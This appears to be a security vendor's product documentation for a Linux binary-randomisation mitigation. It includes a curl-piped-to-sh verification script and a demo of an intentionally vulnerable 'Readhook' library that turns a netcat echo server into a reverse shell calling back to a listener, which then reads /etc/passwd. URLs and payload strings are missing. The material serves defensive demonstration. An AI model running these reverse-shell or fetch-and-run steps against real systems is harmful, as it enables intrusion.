Mitigate Baron SameEdit (CVE-2021-3156) vulnerability

Verification Script

This script lists which repository every installed package was downloaded from. You can use this to verify which packages were replaced by Polymorphic versions.

Note: this script uses the strings utility, which can be found in the binutils package.

curl | sh -s list-installed-elf

Verification Script Output

The verification script will print out a list of binaries installed on your system, their associated packages, which repository they were downloaded from, and if they were compiled with our Polymorphic compiler.

This is some example output from the list-installedf-elf command from a Polymorphed installation of CentOS:

cyrus-sasl-lib.x86_64 @polyverse-os true /usr/lib64/sasl2/
cyrus-sasl-lib.x86_64 @polyverse-os true /usr/lib64/sasl2/
cyrus-sasl-lib.x86_64 @polyverse-os true /usr/lib64/sasl2/
cyrus-sasl-lib.x86_64 @polyverse-os true /usr/sbin/sasldblistusers2
cyrus-sasl-lib.x86_64 @polyverse-os true /usr/sbin/saslpasswd2
dbus.x86_64 @polyverse-updates true /lib64/dbus-1/dbus-daemon-launch-helper
dbus.x86_64 @polyverse-updates true /usr/bin/dbus-cleanup-sockets
dbus.x86_64 @polyverse-updates true /usr/bin/dbus-daemon
dbus.x86_64 @polyverse-updates true /usr/bin/dbus-monitor
dbus.x86_64 @polyverse-updates true /usr/bin/dbus-run-session

Here's what the individual parts of each line mean:

dbus.x86_64 @polyverse-updates true /usr/bin/dbus-run-session

  • dbus.x86_64 - The package that this binary came from
  • @polyverse-updates - The repository this package was downloaded from
  • true - Whether this binary was compiled with our Polymorphic compiler
  • /usr/bin/dbus-run-session - The specific binary for this line of output

If you want to see only the binaries that came from Polyverse repositories, you can pipe the output to grep:

curl | sh -s list-installed-elf | grep polyverse
Back to top

Entropy Analysis

Polyverse provides a completely self-contained binary ROP/JOP gadget analyzer for comparing two binaries side-by-side and understanding their structures. It is written in 100% pure Javascript, and is a self-contained, client-side browser application. It is focused on extreme simplicity of usage and portability across platforms.

  1. Browse to
  2. Retrieve a binary from a system that does not have Polymorphing for Linux
  3. Drag and drop the binary into the specified space in the web application (usually on the right)
  4. Observe that the analysis will automatically begin
  5. Retrieve a binary from a system that does have Polymorphing for Linux installed
  6. Drag and drop the binary into the specified space in the web application (usually on the left)
  7. Observe that the analysis will automatically begin
  8. Observe that the structure of the stock binary is very different from the polymorphic binary

A video can be found on this analysis tool here.

Back to top

Readhook Buffer Overflow Simulator and Exploit

Readhook is an intentional (and very helpful) buffer-overflow tool, which Red-Teams and individuals can use to get past the difficult and time-consuming business of crafting an exploit. It allows for a full demonstration of the capabilities of Polymorphing for Linux, such that a malicious payload, that works across homogeneous systems, will fail when it targets a Polymorphing for Linux system.

We can observe Readhook in action by hooking a standard Linux utility (nc) and then have it “phone home” to a listener on port 5555 via a buffer-overflow exploit. We will rely on Docker to host nc (netcat or ncat on some systems) with Readhook, and a host machine will be listening for the call (also using nc, so try to keep them straight as you step through this). The plain text in the blocks are commands that you can cut and paste into your shells. The bold text are examples of what you can expect to see back from the preceding command.

Shell 1: Start a listener for the exploit to call back to. You’ll need the IP address of this listener so you can generate a payload that knows where to call back to. (Since the host is using Docker for Mac, the Docker DNS entry “docker.for.mac.localhost” can be used, which resolves to the host’s Docker IP address.)

nc -l 5555

Shell 2: Open a new shell to start the echo server with readhook. The following commands retrieve the readhook components and runs (a second) nc configured as an “echo server” with readhook active.

docker run --rm --name echo -d -p 8080:8080 alpine:3.7 sh -c 'wget -q -O /tmp/ && wget -q -O /tmp/ && LD_PRELOAD="/tmp/ /tmp/" nc -l -p 8080 -e /bin/cat'

Shell 2: In the same shell, run (a third) nc to connect to the echo server that you just launched. (It’s running in the background.)

nc localhost 8080

Shell 2: Also in the same shell, try the same thing with the magic string “xyzzx”, the verb “MAKELOAD”, and the IP address (or DNS name) of the listener (listening in shell 1; in my case, I can use the special Docker DNS name “docker.for.mac.localhost”).


That returns:


Aha! That’s not an echo, it’s the string that will cause nc to phone home to the listener. Let’s test it out.

Shell 2: Copy the result from above (the red text) and send it back to the echo server. It contains a magic string and a different verb, “OVERFLOW”.


Hmm… That’s not an echo either. (It turns out the echo server has given way to our exploit: there is now a reverse shell where our echo server used to be.) Let’s go back to our original listener running in Shell 1 to see what we can do.

Shell 1: Go back to the first shell that is listening to port 5555.

cat /etc/passwd
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin

That’s it! You can do the same thing with any application that links to libc (which is just about everything).

Additional Information

Back to top

The registered trademark Linux® is used pursuant to a sublicense from the Linux Foundation, the exclusive licensee of Linus Torvalds, owner of the mark on a world­wide basis.